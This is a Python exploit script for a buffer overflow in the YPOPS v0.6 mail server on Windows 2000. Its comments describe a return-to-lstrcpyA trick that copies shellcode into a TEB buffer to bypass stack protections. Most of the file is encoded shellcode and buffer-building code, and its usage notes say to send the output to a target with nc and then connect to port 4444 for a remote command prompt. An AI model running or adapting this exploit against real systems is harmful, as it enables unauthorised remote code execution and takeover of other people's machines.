pop_exp2.py

`#!/usr/bin/env python  
"""  
Exploit for an old BoF in YPOPS v0.6 discovered by Behrang Fouldai  
Coded as a PoC for defeating NoN-Exec stacks and stack protections  
like overflow guard etc.  
This exploit utilizes the 520 byte buffer in the TEB (i.e is used for  
ANSI to Unicode String operations). The EIP is overwritten with the address  
of lstrcpyA accompanied by the return address, the source and destination buffer  
addresses.  
On successfull EIP overwrite the lstrcpyA copies the attacker supplied payload to  
the address in the TEB, following which the executions proceeds from there (since it  
is the return addr that we supplied). Came across this usefull concept in "The shell coders  
handbook". Can be used for 1) Bypassing stack protections.  
2) When none of the regs (ecx,ebx, eax, esp etc)  
point to our payload.  
  
BUFFER LAYOUT  
  
|payload | addr of lstrcpyA | addr of buff in TEB | addr of buff in TEB | addr of our payload |  
ret addr for destination for Addr of our   
execution Payload Payload  
  
  
Tested on Win2K Adv Server with no patches and overflowguard. This is heavily dependent on the addresses which  
must be modified according to the versions.  
0x77E87E39 --> Address of lstrcpyA from kernel32.dll  
0x7ffDE1BC --> Address in TEB buffer to which payload will be copied and execution   
commences  
0x00E6FAB8 --> Address of Payload on stack  
  
Shellcode from Sergio alvarez's paper on win32 exploitatiion (gr8 paper).  
  
Coded by Varun Uppal ([email protected])  
greetz to JhaanGi, swatkat_razor, saTurn444 and metasploit crew. gr8 work  
  
USAGE:  
  
python pop_exp2.py | nc "addr of target host" "target port"  
  
Telnet "addr of target host" 4444 for cmd prompt   
"""  
  
import struct  
  
exp = "\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\xe0\x66"  
exp += "\x1c\xc2\x83\xeb\xfc\xe2\xf4\x1c\x8e\x4a\xc2\xe0\x66\x4f\x97\xb6"  
exp += "\x31\x97\xae\xc4\x7e\x97\x87\xdc\xed\x48\xc7\x98\x67\xf6\x49\xaa"  
exp += "\x7e\x97\x98\xc0\x67\xf7\x21\xd2\x2f\x97\xf6\x6b\x67\xf2\xf3\x1f"  
exp += "\x9a\x2d\x02\x4c\x5e\xfc\xb6\xe7\xa7\xd3\xcf\xe1\xa1\xf7\x30\xdb"  
exp += "\x1a\x38\xd6\x95\x87\x97\x98\xc4\x67\xf7\xa4\x6b\x6a\x57\x49\xba"  
exp += "\x7a\x1d\x29\x6b\x62\x97\xc3\x08\x8d\x1e\xf3\x20\x39\x42\x9f\xbb"  
exp += "\xa4\x14\xc2\xbe\x0c\x2c\x9b\x84\xed\x05\x49\xbb\x6a\x97\x99\xfc"  
exp += "\xed\x07\x49\xbb\x6e\x4f\xaa\x6e\x28\x12\x2e\x1f\xb0\x95\x05\x61"  
exp += "\x8a\x1c\xc3\xe0\x66\x4b\x94\xb3\xef\xf9\x2a\xc7\x66\x1c\xc2\x70"  
exp += "\x67\x1c\xc2\x56\x7f\x04\x25\x44\x7f\x6c\x2b\x05\x2f\x9a\x8b\x44"  
exp += "\x7c\x6c\x05\x44\xcb\x32\x2b\x39\x6f\xe9\x6f\x2b\x8b\xe0\xf9\xb7"  
exp += "\x35\x2e\x9d\xd3\x54\x1c\x99\x6d\x2d\x3c\x93\x1f\xb1\x95\x1d\x69"  
exp += "\xa5\x91\xb7\xf4\x0c\x1b\x9b\xb1\x35\xe3\xf6\x6f\x99\x49\xc6\xb9"  
exp += "\xef\x18\x4c\x02\x94\x37\xe5\xb4\x99\x2b\x3d\xb5\x56\x2d\x02\xb0"  
exp += "\x36\x4c\x92\xa0\x36\x5c\x92\x1f\x33\x30\x4b\x27\x57\xc7\x91\xb3"  
exp += "\x0e\x1e\xc2\xf1\x3a\x95\x22\x8a\x76\x4c\x95\x1f\x33\x38\x91\xb7"  
exp += "\x99\x49\xea\xb3\x32\x4b\x3d\xb5\x46\x95\x05\x88\x25\x51\x86\xe0"  
exp += "\xef\xff\x45\x1a\x57\xdc\x4f\x9c\x42\xb0\xa8\xf5\x3f\xef\x69\x67"  
exp += "\x9c\x9f\x2e\xb4\xa0\x58\xe6\xf0\x22\x7a\x05\xa4\x42\x20\xc3\xe1"  
exp += "\xef\x60\xe6\xa8\xef\x60\xe6\xac\xef\x60\xe6\xb0\xeb\x58\xe6\xf0"  
exp += "\x32\x4c\x93\xb1\x37\x5d\x93\xa9\x37\x4d\x91\xb1\x99\x69\xc2\x88"  
exp += "\x14\xe2\x71\xf6\x99\x49\xc6\x1f\xb6\x95\x24\x1f\x13\x1c\xaa\x4d"  
exp += "\xbf\x19\x0c\x1f\x33\x18\x4b\x23\x0c\xe3\x3d\xd6\x99\xcf\x3d\x95"  
exp += "\x66\x74\x32\x6a\x62\x43\x3d\xb5\x62\x2d\x19\xb3\x99\xcc\xc2"  
  
  
print '\x90'*10+exp+'\x90'*96+ struct.pack('<L', 0x77e87e39)+struct.pack('<L', 0x7ffde1bc)+struct.pack('<L', 0x7ffde1bc)+'\xb8'+'\xfa'+'\xe6'+'\x00'  
`